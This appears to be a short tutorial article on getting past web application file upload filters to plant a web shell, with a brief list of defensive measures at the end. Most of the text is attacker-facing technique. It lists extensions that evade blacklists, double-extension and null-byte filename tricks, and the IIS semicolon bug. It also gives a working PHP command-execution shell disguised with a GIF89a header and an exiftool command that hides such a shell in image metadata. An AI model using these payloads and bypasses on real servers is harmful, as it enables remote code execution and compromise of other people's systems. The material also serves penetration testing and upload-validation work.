User-uploaded files can give hackers a potential entry-point into web apps, making their safe handling an extremely important task for administrators and the security team. If these files are not validated properly, a remote attacker could upload a malicious file on the web server and cause a serious breach. Malicious files uploads are the result of improper file validation. This leading to code execution. According to OWASP, unrestricted file upload vulnerabilities can allow two different types of attacks. Usually web apps have restrictions to try to make this kind of attacks more difficult, but there are various techniques hackers could use to beat file upload restrictions and get a reverse shell.
Blacklisting is a type of protection where certain strings of data, in many cases, specific extensions, are explicitly prohibited from being sent to the web app server. This may sound like the right solution to prevent dangerous extensions, often shells, from being uploaded to your website, but they aren’t hard to bypass.
here some alternative extensions that can be used to get around blacklist filters.
php.txt, .sh, .pht, .phtml, .phP, .Php, .php7, .php%00.jpeg, .cgi
Another popular extension for web shells are JSP — this is file a server-generated web page. It is similar to an .ASP or .PHP file, but contains Java code instead of ActiveX or PHP
.MF, .jspx, .jspf, .jsw, .jsv, xml, .war, .jsp, .aspx
Method two is using whitelists. Whitelisting as the name say, is the opposite to blacklisting, These servers whitelist will only accept jpeg, gif, png, jpg, ect. This may sound like a better way of protecting your server than using a blacklist, but it can still be bypass using a few tricks. There are some pitfalls in this method too. They are records of server side bugs allowing users to bypass this protection, one of this is:
The IIS 6 semi-colon vulnerability caused by a parser bug which allow users to upload and execute file with names such as testing.asp;.jpg
Using a reverse shell with a photo extension, hackers can fool web app into accepting a php file that also has a JPG/PNG extension:
payload.php.jpg
Also using a null character injection we can bypass whitelist filters to make characters get ignored when the file is saved, injecting this between a forbidden extension and an allowed extension can lead to a bypass:
payload.php%00.jpg OR payload.php\x00.jpg
Usually, if an whitelist accepts only images, it may also accept gif files too. Adding GIF89a; to the very top of your shell may help you bypass the restriction and let you execute the shell.
GIF89a; <?php system($_GET['cmd']); ?>
The next method to bypass file upload restrictions utilizes the Exif data in any image, such as the location, name, camera being used, and much more. Inserting a comment containing a reverse shell payload may by executed by the web app whenever the image is uploaded.
You can add your payload using a tool like exiftool
Inserting a short command shell as information into your photo may look something like this:
$ exiftool -DocumentName="<h1>chiara<br><?php if(isset(\$_REQUEST['cmd'])){echo '<pre>';\$cmd = (\$_REQUEST['cmd']);system(\$cmd);echo '</pre>';} __halt_compiler();?></h1>" pwtoken.jpeg
You can use Exiftool to check for the new added comment into your photo.
$ exiftool pwtoken.jpeg
Then just add a shell extension to make it a executable file once in the web app server:
$ mv catphoto.jpg catphoto.php\x00.jpg
Use this with the methods mentioned at the beginning of this article to bypass any or both blacklists and whitelists.
Restrict file types accepted for upload: check the file extension and only allow certain files to be uploaded. Use a whitelist approach instead of a blacklist. Check for double extensions such as .php.png. Check for files without a filename like .htaccess (on ASP.NET, check for configuration files like web.config). Change the permissions on the upload folder so the files within it are not executable. If possible, rename the files that are uploaded.